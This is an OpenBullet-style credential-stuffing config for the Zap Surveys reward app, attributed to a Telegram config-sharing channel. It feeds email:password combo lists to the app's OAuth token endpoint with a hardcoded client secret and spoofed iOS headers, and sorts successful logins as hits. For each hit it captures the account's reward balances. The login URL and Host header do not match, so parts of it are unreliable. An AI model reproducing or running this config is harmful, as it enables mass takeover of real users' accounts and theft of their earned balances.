[SETTINGS]
{
  "Name": "zapsurveys.com",
  "SuggestedBots": 80,
  "MaxCPM": 0,
  "LastModified": "2022-03-15T11:40:48.1011969+03:30",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@wanted_boy",
  "Version": "1.2.2",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
BEGIN SCRIPT JavaScript
function uuidv4() {
  return 'xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx'.replace(/[xy]/g, function(c) {
    var r = Math.random() * 16 | 0, v = c == 'x' ? r : (r & 0x3 | 0x8);
    return v.toString(16);
  });
}
function generateString(length) {
 var result = '';
 var characters = '0123456789';
 var charactersLength = characters.length;
 for ( var i = 0; i < length; i++ ){
        result += characters.charAt(Math.floor(Math.random() * charactersLength));
    }
    return result;
}
var Output = generateString(7);
Time = Date.now()
var rnd1 = uuidv4();
var rnd2 = uuidv4();
Time = Date.now();
END SCRIPT -> VARS "rnd1,rnd2,Output,Time"

#Trnd1 FUNCTION ToUppercase "<rnd1>" -> VAR "Trnd1" 

#Trnd2 FUNCTION ToUppercase "<rnd2>" -> VAR "Trnd2" 

#Login REQUEST POST "https://lootlagoon.com/api/auth/token" 
  CONTENT "client_id=ios-prod&client_secret=ZVeVfqDNLvCELQudYwQa9z8TeNE7Cyvn&grant_type=password&password=<PASS>&scope=offline_access&username=<USER>&version=7" 
  CONTENTTYPE "application/x-www-form-urlencoded; charset=utf-8" 
  HEADER "Host: auth.zapsurveys.dev" 
  HEADER "Accept: */*" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "User-Agent: Zap/03.06.02 (com.appsthatpay.Zap; build:17; iOS 15.2.1) Alamofire/5.5.0" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "<RESPONSECODE>" EqualTo "400" 
  KEYCHAIN Success OR 
    KEY "access_token" 

#accessToken PARSE "<SOURCE>" JSON "access_token" -> VAR "accessToken" 

#Post REQUEST POST "https://api.zapsurveys.dev/v7/user/userinfo" 
  CONTENT "{\"uniqueId\":\"<Trnd1>\",\"countryCode\":\"US\",\"appsFlyerId\":\"<Time>-<Output>\",\"appVersion\":\"03.06.02\",\"osVersion\":\"iOS 15.2.1\",\"deviceId\":\"<Trnd2>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Host: api.zapsurveys.dev" 
  HEADER "Accept: */*" 
  HEADER "Authorization: Bearer <accessToken>" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "User-Agent: Zap/03.06.02 (com.appsthatpay.Zap; build:17; iOS 15.2.1) Alamofire/5.5.0" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "FREE" OR 
    KEY "\"balance\":0" 

#balance PARSE "<SOURCE>" JSON "data.balance" JTokenParsing=TRUE CreateEmpty=FALSE -> CAP "balance" 

#zapBalance PARSE "<SOURCE>" JSON "data.zapBalance" JTokenParsing=TRUE CreateEmpty=FALSE -> CAP "zapBalance" 

SET CAP "Author Telegram" "@wanted_boy"
SET CAP "Telegram Channel" "https://t.me/OpenBulletConfigs"

